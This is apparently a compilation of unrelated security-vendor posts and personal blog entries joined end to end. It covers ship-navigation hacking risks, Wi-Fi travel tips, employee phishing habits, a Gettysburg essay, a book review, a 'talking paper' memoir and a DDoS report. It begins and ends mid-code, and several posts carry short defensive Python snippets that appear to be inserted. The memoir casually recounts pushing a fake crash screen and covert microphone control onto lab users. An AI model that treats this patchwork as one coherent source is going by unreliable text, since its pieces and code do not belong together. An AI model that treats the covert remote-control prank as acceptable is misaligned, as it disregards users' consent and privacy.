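devices = [
    {"host": "satcom-terminal-1", "user": "admin", "password": "1234"},
    {"host": "satcom-terminal-2", "user": "ops", "password": "Xk#92!vLq"},
]

at_risk = [d["host"] for d in devices if uses_default_login(d["user"], d["password"])]
print(at_risk)  # → ['satcom-terminal-1']
```

A real audit would of course check far more than a static list, but even this trivial comparison catches the “admin/1234” case described above.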

ECDIS, charting a course for disaster

The Electronic Chart Display and Information System (ECDIS) is the electronic system used by these ships to navigate, and that also warns the captain about any hazards on their course. This tool, which contains graphical and nautical information, is an alternative to the old fashioned maritime maps that don’t offer information in real time.  Upon testing over 20 different ECDISs, the analysts discovered that most of them used very old operating systems (some with Windows NT, from 1993), and incorporated configuration interfaces with low levels of protection.

In this way, the researchers demonstrated that cyberattackers could cause the ship to crash by accessing the ECDIS and reconfiguring the database in order to modify the dimensions of the ship. If the ship seemed to be a different size, longer or wider than it really is, the electronic systems would offer incorrect information to other nearby crews.  They also showed that attackers could force a collision by falsifying the position of the ship shown on the GPS receiver.  It may sound implausible, but in the case of particularly busy shipping routes or places with low visibility, a falsification of this type could be catastrophic.

Even if the vulnerabilities shown by the analysts aren’t exploited in such an extreme way, it’s hugely important to know that security gaps in vessels can cause substantial damage, both to national industries and in the maritime environment, including ports, canals, and docks.  The analysts underlined that, by using ECDIS, it is also possible to gain access to the systems that warn the captain of possible collision scenarios.  By controlling these collision alarms, attackers could bring routes as important as the English Channel to a standstill, endangering the imports and exports of a whole country.

Simple solutions for complex systems

As well as updating systems and ensuring that no sensitive information is exposed on the network, the shipping industry must also maintain the defenses that are needed for Internet devices, like we’ve seen in the case of satellite communication systems. To maintain connection privacy, Transport Layer Security (TLS) protocols must be put in place on these devices, since a failure in just one device can compromise the security of the whole network.
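To make the TLS recommendation concrete, here is a minimal sketch using Python’s standard `ssl` module. The defaults of `create_default_context()` already enforce certificate verification and hostname checking, which is what prevents the kind of connection interception described above (the commented-out connection code is illustrative, with a placeholder host):

```python
import ssl

# create_default_context() enables certificate verification and hostname
# checking by default, which blocks simple man-in-the-middle interception.
context = ssl.create_default_context()
assert context.verify_mode == ssl.CERT_REQUIRED
assert context.check_hostname is True

# Refuse legacy protocol versions explicitly (Python 3.7+).
context.minimum_version = ssl.TLSVersion.TLSv1_2

# The context would then wrap a socket to the device, for example:
# with socket.create_connection((host, 443)) as sock:
#     with context.wrap_socket(sock, server_hostname=host) as tls:
#         ...
```

The point of the sketch is that modern standard libraries make the secure configuration the default one; insecurity on these devices is usually the result of opting out of it.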

The analysts reported that a first step to mitigate most of the problems exposed in the study would be to use strong passwords for admin profiles, making sure to modify the default login details.  To avoid serious problems like sabotage, destruction of ships or goods, collisions, and loss of infrastructure, it’s essential to have protection systems for the whole network perimeter, including the transport of goods, to bring the domain of cybersecurity out into international waters.
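Replacing default login details is cheap to do well. As a minimal sketch, Python’s standard `secrets` module can generate a cryptographically random admin password (the length and character set here are illustrative choices, not a recommendation from the study):

```python
import secrets
import string

def generate_password(length: int = 20) -> str:
    """Generate a cryptographically random password for an admin profile."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

new_password = generate_password()
print(len(new_password))  # → 20
```

Unlike `random`, the `secrets` module draws from the operating system’s CSPRNG, so the output is suitable for credentials.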

The post Danger on board: shipping routes are at risk appeared first on Panda Security Mediacenter.

SN 670: Wi-Fi Protected Access v3

This week we discuss the interesting case of a VirusTotal upload... or was it?, newly discovered problems with our 4G LTE... and even what follows, another new EFF encryption initiative, troubles with Spectre and Meltdown in some browsers, the evolution of UPnP-enabled attacks, an unpatched WordPress vulnerability that doesn't appear to be worrying the WordPress devs... and an early look at next year's forthcoming WPA3 standard... which appears to fix everything!

We invite you to read our show notes.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written, SpinRite 6.

Bandwidth for Security Now is provided by CacheFly.

Summer Vacation Plans? Be Safe When Connecting!

Tips to Protect Yourself While Traveling

Summer travel should be a respite from work, when you relax and don’t have to worry about business. And your mobile devices can help make it easier, whether it’s booking a flight or a hotel room, ordering a cab or an Uber driver, browsing websites for your next destination, connecting to family via voice or messaging, even purchasing items in a checkout line or withdrawing cash from an ATM.

That said, all this digital convenience comes at a certain price of vigilance: there are more ways than ever to be exposed to threats on your mobile devices, to have your data, money, or identity stolen. These threats usually arrive by way of your networking options, when emailing, messaging, browsing, or using particular apps and online accounts. Wi-Fi leads the way, followed by near-field communication (NFC) and even Bluetooth (in certain circumstances). But even a simple QR scan on your smartphone or insertion of a USB stick into your laptop can open you up to unexpected threats.

Just when, where, and how do travelers need to be cautious? And how can you protect yourself from networking threats that can turn your vacation into a nightmare?

Wi-Fi Safety Measures

Wi-Fi is your main avenue for online connections. Wi-Fi hotspots are everywhere today, in airport terminals or on the shuttle bus, in restaurants and in sidewalk cafes, in your hotel room or out in the mall. How do you safely connect to Wi-Fi?

  • For starters, make sure your phone or tablet has a current, updated OS before you leave home, with the latest security patches. This minimizes the vulnerability of your mobile device.
  • Turn off auto-connect to the nearest available Wi-Fi hotspot, such as the town or plaza’s unsecured router. When you’re travelling to new places, retain the option to decide just where and when you want to connect.
  • Before you connect to public Wi-Fi, turn off automatic file sharing/sync. You don’t want your precious files intercepted.
  • Watch out for copycat/evil twin Wi-Fi hotspots that look like legitimate ones. Check the URL for odd changes to the expected format/syntax, possibly indicating a spoofed malicious website. Check commerce or banking URLs for the green Secure lock and the https:// designation before you conduct transactions.
  • Don’t be lulled by the Wi-Fi available in your cozy hotel room. Password-protected, even paid Wi-Fi, is not necessarily properly encrypted, as set up by the hotel technician. WEP encryption, the first security option in Wi-Fi routers, is relatively weak and easy for hackers to break into.
  • If Wi-Fi isn’t available, don’t use your smartphone’s Portable Wi-Fi Hotspot in a public place, to prevent unwanted users or hackers from accessing it. If you do turn it on (in a safer place), increase your security by changing the default SSID (or hiding it), using a strong randomized password, and enabling WPA2 encryption, not WEP, which is easier to hack, as noted above. Note that you’ll need a mobile service and data plan that supports your Portable Wi-Fi Hotspot and the higher data usage.
  • Use a VPN app to secure your connection to public Wi-Fi. This encrypts your data, so it can’t be read by a “man-in-the-middle.” Conversely, if you don’t have a VPN app, don’t log onto a sensitive or financial site with your ID and password, particularly in places where people congregate. You don’t want your credentials stolen by that plain-looking hacker sitting quietly behind his laptop in the corner of the room!
  • Use browser protection to block bad URLs while browsing and to protect your device from drive-by downloads.
  • Use a password manager to access your personal accounts. This ensures your ID and password are encrypted, while enforcing the use of strong, unique passwords. Personal accounts should be set up beforehand with two-factor authentication, where your smartphone is sent the code for access.
  • To be super-safe, encrypt the data on your mobile device’s main disk and/or SD card, though check beforehand whether any country on your itinerary bans travellers from bringing in such encryption software.
  • Install security software on your mobile device, if you haven’t already. This not only protects your mobile device from fake apps and viruses while on the move, it typically lets you remotely lock or wipe it of personal data should it be lost or stolen.
  • Heed all the relevant tips above for your laptop too.
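Several of the tips above (checking for the https:// designation and for odd changes to the expected URL) can be mechanised. A minimal sketch using Python’s standard `urllib.parse`, where the trusted-host list is a hypothetical example:

```python
from urllib.parse import urlparse

TRUSTED_HOSTS = {"www.mybank.com"}  # hypothetical allow-list for illustration

def looks_safe(url: str) -> bool:
    """Require HTTPS and an exactly matching, trusted host name."""
    parts = urlparse(url)
    return parts.scheme == "https" and parts.hostname in TRUSTED_HOSTS

print(looks_safe("https://www.mybank.com/login"))    # → True
print(looks_safe("http://www.mybank.com/login"))     # → False  (no TLS)
print(looks_safe("https://www.mybank.com.evil.io"))  # → False  (spoofed host)
```

The third case is the “evil twin” pattern: the trusted name appears in the URL, but only as a prefix of a different registered domain, which is why an exact hostname match matters more than eyeballing the address bar.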

USB, QR Code, Near-Field Communication (NFC), and Bluetooth Safety Measures

While Wi-Fi is the most likely vector for threats while traveling, a few more “connected” scenarios are sources for possible attacks:

  • Whenever possible, use your own charging equipment to recharge your mobile device. Public charging spots may be tampered with for “juice-jacking,” where malware can be installed on your device via USB, to copy all your data covertly. And don’t insert USB sticks in your laptop from “friendly” strangers, to share photos or files and such. The USB stick may be infected with viruses or data-stealing malware.
  • Be cautious when scanning QR codes, whether they’re on flyers stuck on your rental car in the parking lot, stickers pasted over legitimate product ads, or QR-enabled display cards for purchasing anything in a convenience store. Malicious QR codes can take you to malicious websites, which download viruses or malware on your device.
  • Don’t put your NFC-enabled Android smartphone (for use with Android Pay, Google Pay, or Samsung Pay, etc.) in a pocket that could be “bumped” in a crowded public space by a hacker with an NFC-enabled phone or a snooping device, which can install viruses or malware on your phone. Be careful of things like posters that sport unprotected NFC chips (for example, for movie previews and the like). Exposed chips can be pasted-over with spoofed, malicious chips. Check to make sure the NFC-enabled ATM hasn’t been tampered with when you’re using it to extract money from your bank account.
  • For the super-cautious: Turn off Bluetooth in public spaces, unless you’re using it to connect to your keyboard, mouse, or smartwatch, etc. Bluetooth snoopers can potentially access your device to control it or to download malware (a rare occurrence, it’s true, but possible). Turning off Bluetooth also helps save battery life.

Mobile Security While on the Road

Fortunately, Trend Micro provides a bevy of free and paid apps that can help you stay secure while traveling.

Free:

  • Trend Micro Zero Browser on iOS provides web-threat and virus protection when browsing.
  • Trend Micro QR Scanner for Android ensures secure QR code scanning, so you can’t be taken to a malicious website by a bad QR code.
  • Trend Micro Password Manager on Android and iOS (free versions) provides encrypted logins with strong passwords for five online accounts.

Paid:

  • Android – Provides a Wi-Fi Checker, protects your browser from web threats, scans apps before they’re downloaded from Google Play, and provides antimalware and antivirus protections using real-time and manual scans. Parental and App Controls let parents protect kids at home or traveling from inappropriate websites or prohibited applications. You also get Lost Device Protection, to lock or wipe your device if it’s lost or stolen.

  • iOS – Also provides a Wi-Fi Checker, a SafeSurfing browser, a Secure QR Code Scanner, a Content Shield (with a Firewall, Website Filter, and Parental Controls), and Lost Device Protection.

  • Finally, Trend Micro Security for Windows and Mac provides full security across all attack vectors for your PC or Mac laptop. Trend Micro Maximum Security edition provides a Secure Erase and a password-protected file Vault to protect your critical files while traveling. It also lets you install additional protection for up to ten seats, including Windows, Mac, Android, and iOS devices.

Go to Trend Micro Security Products for Home for more information about Trend Micro’s security products and services for everyday users, including those for mobile devices.

The post Summer Vacation Plans? Be Safe When Connecting! appeared first on .

Employee habits that can put your company at risk

We often talk about the cybersecurity risks that companies can be exposed to through their own Internet connections, but the truth is that most of the time, the employees themselves tend to be the weakest link in the company.

And the fact remains that there are several things that employees may do every day that could well lead to serious security breaches. That’s why it’s a good idea to be up to speed with the threats you could be facing, and to be responsible when managing the tools that are used to handle the company’s information.

Be careful with public WiFi

Although this habit is probably one of the most widespread among the majority of employees, it’s also one of the least advisable.  These days we struggle between wanting to consume more content and trying to use less data. This means that finding a totally or partially open Wi-Fi connection can seem like a godsend, especially for someone needing to do something work-related, such as connect to the company’s internal network, send large files, log on to platforms that consume a lot of data, and so on.

However, using public WiFi can really put your company’s cybersecurity at risk. When in use, this connection can expose the user to possible intruders who, with a bit of social engineering, could gain access to the employee in question’s data: usernames and passwords, or confidential company information, to name but a few. Stealing information through open WiFi connections isn’t as difficult as you might expect, so it’s best not to trust them to keep you safe.

How to avoid it

To avoid this kind of risk, it’s absolutely essential that employees avoid using open WiFi connections wherever possible.  In the rare case that an employee has no choice but to use a connection of this type, they should do so with a VPN that can protect their data, and, more importantly, any sensitive information that they may have on their device, thereby minimizing the possible risks.

Phishing, malware, and intrusions

The endless back and forth of emails is a constant in almost every type of company, and it can entail certain risks.  One clear example of this is the tech support scam: an employee receives an email asking for certain data, under the pretext of solving some kind of technical problem. The information the employee hands over then ends up in the hands of someone who can jeopardize the whole company’s cybersecurity.

But this isn’t the only case. A cybercriminal can also send an email impersonating another employee, with an attachment that could be invasive, steal data from the computer, or even spy on and monitor the activity carried out on the device.
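One simple heuristic against this kind of impersonation is to compare the domains in a message’s From and Reply-To headers, since phishing mail often spoofs a trusted sender but routes replies elsewhere. A minimal sketch using Python’s standard `email` module (the sample message and domains are fabricated for illustration; this is a toy check, not any vendor’s detection logic):

```python
from email import message_from_string
from email.utils import parseaddr

def replyto_mismatch(raw_message: str) -> bool:
    """Flag messages whose Reply-To domain differs from the From domain."""
    msg = message_from_string(raw_message)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2]
    reply_domain = parseaddr(msg.get("Reply-To", ""))[1].rpartition("@")[2]
    return bool(reply_domain) and reply_domain != from_domain

sample = (
    "From: IT Support <support@example-corp.com>\n"
    "Reply-To: helpdesk@attacker.example\n"
    "Subject: Password reset required\n\n"
    "Please confirm your credentials."
)
print(replyto_mismatch(sample))  # → True
```

A mismatch is not proof of fraud (mailing lists use Reply-To legitimately), but it is exactly the kind of cheap signal a mail gateway can surface to users.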

Mobile apps can also pose a series of risks. If an employee is in the habit of using their personal phone to handle company data and information, managing apps improperly could give rise to problems, especially if access is granted to unofficial apps that, in the same way as malware, get hold of the information stored on the phone, spy on it, or even modify its operation guidelines.

How to avoid it

The key thing here is raising awareness about corporate cybersecurity: every company must make sure its employees know the importance of being responsible with emails and the apps on their phones.  In the case of the latter, they should only be downloaded from operating systems’ official stores.

On the other hand, it’s important for companies to have ransomware insurance, and encryption on their company email. This way, as well as avoiding possible intruders, if someone does manage to gain unauthorized access to the IT system, confidential information will be better protected, and the company’s cybersecurity won’t be compromised.  If you want a tool that can help you to avoid unwanted visitors, you can try Panda Adaptive Defense, the tool that will help you to batten down the hatches of your company’s IT security. Panda’s advanced cybersecurity solution allows you to stay ahead of attacks, even before they happen, limiting the risks stemming from everyday tasks that employees carry out without thinking.

The post Employee habits that can put your company at risk appeared first on Panda Security Mediacenter.

This Day in History: Gettysburg Shoes

July 1st marks the beginning of a Civil War battle that many historians say is one of the most pivotal. And, as many historians also like to note, a love of pillaging Americans for their shoes supposedly is what drew pro-slavery forces arrogantly into Gettysburg on this date.

This topic of shaking-down hardworking Americans for their shoes is tied to General A. P. Hill. The man was a wealthy elitist who expected things for free (see also: slavery) and eagerly had abandoned his appointment in the U.S. Army to fight against freedom. To put it simply, Hill was committed to the violent expansion of slavery long after the practice had been abolished around the world.

Two decades before Hill was born, in 1807, England had already abolished its slave trade. The idea of slavery became so unjustifiable in English society that by “1824 there were more than 200 branches of the Anti-Slavery Society in Britain“. No surprise then that the agrarian state of New York abolished slavery in 1827, England emancipated slaves in 1833, the English colonies in 1838…but I’m getting ahead of myself here.

Mary Wollstonecraft, credited with helping found modern British feminist ethics, famously wrote against slavery in 1792:

Is sugar always to be produced by vital blood? Is one half of the human species, like the poor African slaves, to be subject to prejudices that brutalise them, when principles would be a surer guard, only to sweeten the cup of man? Is not this indirectly to deny woman reason?

Wollstonecraft’s sentiment was shared in the colonies, believe it or not, and thus we see examples like the agrarian colony of New York debating how to expedite emancipation, two decades earlier than Wollstonecraft’s call for a boycott on slave-made goods:

Most of the Revolutionary leaders who came to power in New York in 1777 had anti-slavery sentiments, yet, as elsewhere in the North, the urgency of the war with Britain made them delay, and they restricted their activity to a policy statement and an appeal to future legislatures “to take the most effective measures consistent with public safety for abolishing domestic slavery.” This resolution passed in the state Constitutional Convention by a vote of 29 to 5.

Note the five dissenters. Obviously some in the 1700s were not quite convinced. And so by 1861 we have a treasonous General A. P. Hill taking up arms against his own country. In a nutshell, many white elitist men in America did not want to do hard work and believed their easy/lazy lives and financial inheritances (see also: people treated as property to be bought and sold) were threatened unless they could continue to enslave Americans and steal their goods.

Today you may be surprised to see the U.S. Army has named a fort after an infamously treasonous and foolish man like A. P. Hill. Given that he dedicated his life to killing American soldiers for personal profit, who thought this made any sense?

The installation was named in honor of Lt. Gen. Ambrose Powell Hill, a Virginia native who distinguished himself…

Please take special note of the fact that the U.S. Army doesn’t call the person they are honoring an American, because his treason to preserve slavery by killing Americans, killed his citizenship.

Also nice try U.S. Army with your Virginia reference. Obviously Hill was far from being a true native of Virginia.

That being said I must agree with the second part of the sentence, this treasonous man hateful of his own country certainly distinguished himself. The U.S. Army doesn’t mention it but his impatience, as well as lust for plundering Americans and putting people in chains, may have led to one of the greatest tactical blunders in U.S. military history. So distinguishable.

Also he contracted gonorrhea while a cadet at West Point, screwed around so much he graduated late, and became known for taking “sick leave” right in the heat of any major battle.

Now, to be fair to Hill being so distinguished, I must admit he shared poor decision-making with his pro-slavery General Heth on June 30th, 1863. Heth had ordered his pro-slavery General Pettigrew to enter Gettysburg and ransack it. Pettigrew had followed these orders at first but turned tail after he observed American cavalry and infantry already near the town.

In “The Civil War: A Narrative” there’s a scene where Hill approaches Heth and hears of Pettigrew’s reluctance. Hill, our man of the hour, then insists to Heth there can be no significant American forces present.

OOPS.

The narrative tells us Heth obediently then sends his Pettigrew back once again to plunder Gettysburg and “get those shoes!”

Narratives aside, by 5AM on July 1st, as Heth himself approached Gettysburg to damage it, he realized Pettigrew had been right, Hill was stupidly wrong, and significant numbers of American forces were present. Yet even that didn’t dissuade Heth, who continued ordering Pettigrew to march on.

Hill’s insistence that he conferred with Lee and there would be no resistance to plunder seems to be the real story here, shoes or not. There was an inherent desperation of Lee and his pro-slavery men to plunder America (see also: slavery), which on this particular day began the largest land battle in the western hemisphere, lasting 3 days and killing nearly 50,000 people, to the disadvantage of pro-slavery forces.

One of the stranger footnotes (no pun intended) to this story is that while Gettysburg had a lot of American forces defending freedom, it didn’t have any shoes.

These pro-slavery Generals, all of them, not only chose to be blind to the evils of slavery, they also were blind on two more levels. A particularly inhumane General with the ironic name of Early (infamous for helping to invent the “Lost Cause” view) had tried to pillage Gettysburg days before Heth had set his sights on it.

This means Americans living in Gettysburg already had been subjected to pro-slavery militia attacking the town and demanding a ransom of 1,000 shoes.

No shoes were found, as you can plainly read here:

Had there been any shoes, they might have been the standard issue “Jefferson Boots”, named after Thomas Jefferson who is thought to have created an American fad for French ankle-high laced shoes by wearing them instead of previously common English ones with large buckles.

However, again I must say, NO SHOES IN GETTYSBURG.

So for those historians arguing pro-slavery forces really centered their offensive on shoes, maybe put a sock in it.

Is there any evidence that pro-slavery General Early told others that the town couldn’t cough up any Jefferson boots despite his violent demands? Lee and Hill both supposedly had scouts relaying information but perhaps it wouldn’t have made any difference what Early said, given how Pettigrew was rebuffed when he tried to explain the dangers of trying to plunder Americans on this day.

To put this in perspective, it’s not like in the days leading up to the Gettysburg battle someone could tell Lee or Hill that slavery is unjustified and they would listen; if these men wanted stealing to be in their plans, they were going to threaten and kill Americans until some damn things to steal were found or everyone was dead for refusing to see things the pro-slavery way.

Again, Hill quit the U.S. Army to plunder America in the most unjustified way to retain elite status. In that sense Gettysburg was simply another day of plunder to Hill and his men, whether stealing goods, separating babies from mothers, or perpetuating slavery to improve his own status at the expense of others.

Within three days pro-slavery forces had been destroyed at Gettysburg, which helped signal an end to their plans to use violence against fellow citizens to expand slavery practices into western territories (what the war was really about); 60 years after England had abolished slavery, and 30 years after slaves in America (if still colonies) would have been emancipated, the self-proclaimed “elite” white supremacists fighting to perpetuate obviously tyrannical practices of their former King were defeated (pun not intended).

Also, just as one final footnote, I think it is time for the U.S. Army to officially remove honors to Hill. I say that not only because Hill was a murderous traitor and terror to Americans, but also because we could say he finally got the boot he so desired.

Book Review: The Mission, the Men and Me

Pete Blaber’s book “The Mission, the Men, and Me: Lessons from a Former Delta Force Commander” gets a lot of rave reviews about business practices and management tips.

It’s hard not to agree with some of his principles, such as “Don’t Get Treed by a Chihuahua”. This phrase is a cute way of saying know your adversary before taking extreme self-limiting action. Who would disagree with that?

But I’m getting ahead of myself. The book begins with a story of childhood, where Pete reflects on how he topographically mastered his neighborhood and could escape authorities. That gives way to a story of his trials and tribulations in the Army, where during training he was tested by unfamiliar topography and uncertain threats. It is from this training scenario that Pete formulates his principle to not jump off a cliff when a pig grunted at him (sorry, spoiler alert).

Maybe a less cute and more common way of saying this would be that managers should avoid rushing to conclusions when a little reflection on the situation can help them choose the most effective path. Abraham Lincoln probably said it best:

Give me six hours to chop down a tree and I will spend the first four sharpening the axe.

How should someone identify whether they are facing a Chihuahua, given their other option is to blindly climb a tree? Pete leaves this quandary up to the reader, making it less than ideal advice. I mean if in an attempt to identify whether you are facing a Chihuahua, wild pig or a bear you get mauled to death, could you sue Pete for bad advice? No, because it was a bear and instead of being up a tree you are dead.

Given the lessons learned in joining the Army, Pete transitions to even more topographical study. He masters mountain climbing with a team in harsh weather. It’s a very enjoyable read. I especially like the part where money is no object and the absolute best climbing technology is available. There’s no escaping the fact that the military pushes boundaries in gear research and keeps an open mind/wallet to technology innovations.

From there I can easily make the connection to the climax of the book, where he leads a team on a topographically challenging mission and minimizes their risk of detection. It really comes full circle to his childhood stories.

However, there are a few parts of the book that I found strangely inconsistent, which marred an otherwise quick and interesting read.

For example, Pete makes a comment about religion and culture that seems uninformed or just lazy. He refers to Cat Stevens as the “most renowned celebrity convert to Islam”:

I’m not claiming to be an expert in celebrity status or Islam, just saying it should be kind of obvious to everyone in the world that Muhammad Ali (né Cassius Clay) is far more renowned as a celebrity convert to Islam. I don’t think Cat Stevens even breaks into top ten territory.

After winning Olympic gold in 1960, the hugely popular Clay not only went on to convert, he also refused to serve in the US armed forces in Vietnam because he was a “minister in the religion of Islam”. As the FBI puts it in their release of surveillance files:

…famed Olympian, professional boxer and noted public figure. This release consists of materials from FBI files that show Ali’s relationship with the Nation of Islam in 1966.

Pete’s comment about Cat Stevens suggests that despite the no-holds-barred approach to piles of rock, he may lack knowledge in human topics essential to conflicts he was training to win. A quick look at discussion of Islamic celebrities backs up this point:

Pete was wandering on that flat line at the bottom while giant mountains of culture stood right above him, unexplored, despite his access to the best tools.

There are at least two more examples of this class of error in the book. I may update the post with them as I have time.

The Psychology of “Talking Paper”

Sometime in the late 1980s I managed to push a fake “bomb” screen to Macintosh users in networked computer labs. It looked something like this:

There wasn’t anything wrong with the system. I simply wanted the users in a remote room to restart because I had pushed an “extension” to their system that allowed me remote control of their speaker (and microphone). They always pushed the restart button. Why wouldn’t they?

Once they restarted I was able to speak to them from my microphone. In those days it was mostly burps and jokes, mischievous stuff, because it was fun to surprise users and listen to their reactions.

A few years later, as I was burrowing around in the dusty archives of the University of London (a room which sadly no longer exists, having been replaced by computer labs, though Duke University has a huge collection), I found vivid color leaflets that had been dropped by the RAF into occupied Ethiopia during WWII.

There in my hand was the actual leaflet credited with psychological operations “101”, and so a color copy soon became a page in my graduate degree thesis. In my mind these two experiences were never far apart.

For years afterwards when I would receive a greeting card with a tiny speaker and silly voice or song, of course I would take it apart and look for ways to re-purpose or modify its message. Eventually I had a drawer full of these tiny “talking paper” devices, ready to deploy, and sometimes they would end up in a friend’s book or bag as a surprise.

One of my favorite “talking” devices had a tiny plastic box that upon sensing light would yodel “YAHOOOOOO!” I tended to leave it near my bed so I could be awakened by yodeling, to set the tone of the new day. Of course when anyone else walked into the room and turned on the light their eyes would grow wide and I’d hear the invariable “WTF WAS THAT?”

Fast forward to today and I’m pleased to hear that “talking paper” has become a real security market, with devices getting thinner, lighter and more durable. In areas of the world where Facebook doesn’t reach, military researchers still believe psychological manipulation requires deploying their own small remote platforms. Thus talking paper is as much a thing as it was in the 1940s or before, and we’re seeing cool mergers of physical and digital formats, which I tried to suggest in my presentation slides from recent years:

While some tell us the market shift from printed leaflets to devices that speak is a matter of literacy, we all can see clearly in this DefenseOne story how sounds can be worth a thousand words.

Over time, the operation had the desired effect, culminating in the defection of Michael Omono, Kony’s radio telephone operator and a key intelligence source. Army Col. Bethany C. Aragon described the operation from the perspective of Omono.

“You are working for a leader who is clearly unhinged and not inspired by the original motivations that people join the Lord’s Resistance Army for. [Omono] is susceptible. Then, as he’s walking through the jungle, he hears [a recording of] his mother’s voice and her message begging him to come home. He sees leaflets with his daughter’s picture begging him to come home, from his uncle that raised him and was a father to him.”

Is anyone else wondering if Omono had been a typewriter operator instead of radio telephone whether the US Army could have convinced him via print alone?

Much of the story about the “new” talking paper technology is speculative about the market, like allowing recipients to be targeted by biometrics. Of course if you want a message to spread widely and quickly via sound (as he’s walking through the jungle), using biometric authenticators to prevent it from spreading at all makes basically no sense.

On the other hand (pun not intended) if a written page will speak only when a targeted person touches it, that sounds like a great way to evolve the envelope/letter boundary concepts. On the paper is the address of the recipient, which everyone and anyone can see, much like how an email address or phone number sits exposed on encrypted messaging. Only when the recipient touches it or looks at it, and their biometrics are verified, does it let out the secret “YAHOOOO!”

The Safety of Your Data On Social Media

Trend Micro recently asked a simple question on Twitter, “Are you worried about the safety of your data when using social media?”

Are you worried about the safety of your data when using social media?

More than 33,000 responses later and the answer is a toss up. The discussions in response to our tweet didn’t provide a clear answer either. This is despite months of high profile Facebook scandals and years of massive data breach headlines.

So what’s going on?

The Question

Posing a poll question is tricky. The question needs to be approachable enough to generate a lot of answers. It also needs to be a simple multiple choice, with only a few words per answer.

This will almost always result in a straightforward poll.

Not so this time. The answers are almost evenly divided across the three possible responses. Digging deeper, one of the challenges is how respondents chose to define the “safety” of their data.

As a security professional, I use one definition, but in my experience most people have their own idea when it comes to the “safety” of their data.

For some, it’s being in control of who can access that data. For others, safety is whether or not the data will be available when they want to access it. Others still think about whether or not they can get their data back out of the network once it has been shared.

The formal name for these concepts in information security is the CIA triad—I know, I know, I didn’t name it—confidentiality, integrity, and availability.

Whether you know it or not, for any definition of “safe,” you need all three of these attributes. Let’s look at each in turn.

Confidentiality

If everything you posted on Facebook was public, how often would you share?

Confidentiality is the most important attribute for the safety of your data on social networks. Not having control of who can access your data makes social networks significantly less valuable.

How you control the confidentiality of your data depends on the network.

On Facebook, you can change each post to be visible by only you, your friends, or the public. Other finer grain options for each post exist as well if you know how to find them. Similarly “Groups” allow you to share with a different audience.

On LinkedIn, you get similar options as Facebook. Twitter is much simpler. Your tweets are either public, protected (you approve who can see them), or sent as a 1:1 direct message.

WhatsApp allows for 1:1 messaging or groups. Instagram defaults to public sharing but also allows direct messages.

Each of these systems helps you control who can see your data; in other words, they let you control its confidentiality.

The more control you have and know how to use, the safer you will feel about your data.
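Those per-post audience controls boil down to a simple access check. Here is a minimal, hypothetical Python sketch of the idea (the `Post` class and audience names are invented for illustration, not any network's actual API):

```python
# Hypothetical model of per-post audience settings ("only_me", "friends",
# "public"), illustrating the confidentiality check a network performs
# before showing a post to a viewer. Not any real platform's API.
from dataclasses import dataclass, field

@dataclass
class Post:
    author: str
    text: str
    audience: str = "friends"              # "only_me", "friends", or "public"
    friends: set = field(default_factory=set)

    def visible_to(self, viewer: str) -> bool:
        """Return True if `viewer` is allowed to read this post."""
        if self.audience == "public":
            return True
        if self.audience == "friends":
            return viewer == self.author or viewer in self.friends
        return viewer == self.author       # "only_me": author alone

post = Post(author="alice", text="hello", audience="friends", friends={"bob"})
print(post.visible_to("bob"))      # True: bob is in the friends set
print(post.visible_to("mallory"))  # False: outside the chosen audience
```

The point of the sketch is that the "safety" of a post is decided at read time by whatever audience setting you chose at write time, which is why knowing those settings matters.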

Integrity

Integrity is less of an issue with the major social networks. It’s understandable that once you’ve posted something, you expect the same information to be shown when appropriate.

But integrity issues do pop up in unexpected ways.

This happens most commonly when you post a video or photo and the network attempts to help you by automatically applying a filter, adjusting the levels, or possibly making edits on your behalf.

When your data changes without your permission or awareness, it could lead to unintended consequences.

Availability

Availability comes into play in two primary ways. It’s rare for social networks to have downtime or errors. This means that your data is almost always available when you want to view or share it.

The larger question of whether you can get your data back in its original format is much trickier. It’s a rare case that the social networks will let you export your complete information. It usually runs counter to their business model.

However, some networks do offer the ability to export said data from your account. This helps increase its availability to you.

Where Should You Focus?

The poll lacks context, which is the most likely reason why we saw the answers split almost evenly among the three choices.

While the availability and integrity of your data are important, in the context of your social media usage confidentiality should be top of mind.

Most social networks provide a set of privacy controls that allow you to control who on the network can see your data.

Due to the nature of social media, these controls can change regularly. You should make a habit of checking the available options every so often to ensure that your data is safe.

Care About How You Share

Social media can be a fantastic way to engage with various communities, stay in touch with family and friends, and expand your perspective. Unfortunately, there are downsides as well.

We’ve posted before about fake news, the privacy impact of networks selling data, and other issues related to social media usage.

Despite these challenges, there are still more upsides than downsides. The key to being a responsible social media user is to understand the control you have over your data.

Regardless of how you define “safe,” it’s important to be aware of the network you’re sharing on, how to use the control settings on that network, and have a clear understanding of what information you’re comfortable sharing.

What social media networks do you use most often? Do you feel you understand their privacy settings? Let us know down below or on social media (we’re @TrendMicro on most networks).


Q1 2018 DDoS Trends Report: 58 Percent of Attacks Employed Multiple Attack Types

Verisign just released its Q1 2018 DDoS Trends Report, which represents a unique view into the attack trends unfolding online, through observations and insights derived from distributed denial of service (DDoS) attack mitigations enacted on behalf of Verisign DDoS Protection Services, and security research conducted by Verisign Security Services.

Download your free copy of the Q1 2018 DDoS Trends Report

Verisign observed that 58 percent of DDoS attacks that were mitigated in Q1 2018 employed multiple attack types. There was a 53 percent increase in the number of attacks, as well as a 47 percent increase in the attack peak sizes, when compared to Q4 2017; however, the attack peak sizes have decreased by 21 percent, year over year.

The largest volumetric and highest intensity DDoS attack observed by Verisign in Q1 2018 was a multi-vector attack that peaked at approximately 70 Gigabits per second (Gbps) and 7.4 Million packets per second (Mpps). The attack consisted of a wide range of attack vectors including TCP SYN and TCP RST floods, DNS and SNMP amplification attacks, Internet Control Message Protocol (ICMP) floods, and invalid packets.
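Mitigating a multi-vector attack like this starts with classifying traffic by vector. As a purely illustrative sketch (the function, thresholds, and data below are invented, not Verisign's method), a naive per-source, per-protocol rate counter might flag flood candidates like this:

```python
# Illustrative only: a naive per-source, per-protocol packet counter of
# the kind a mitigation pipeline might use as a first flood signal.
# The threshold is an assumed tuning value, not a real-world figure.
from collections import Counter

FLOOD_THRESHOLD = 1000  # packets per observation window (assumed)

def flag_floods(packets, threshold=FLOOD_THRESHOLD):
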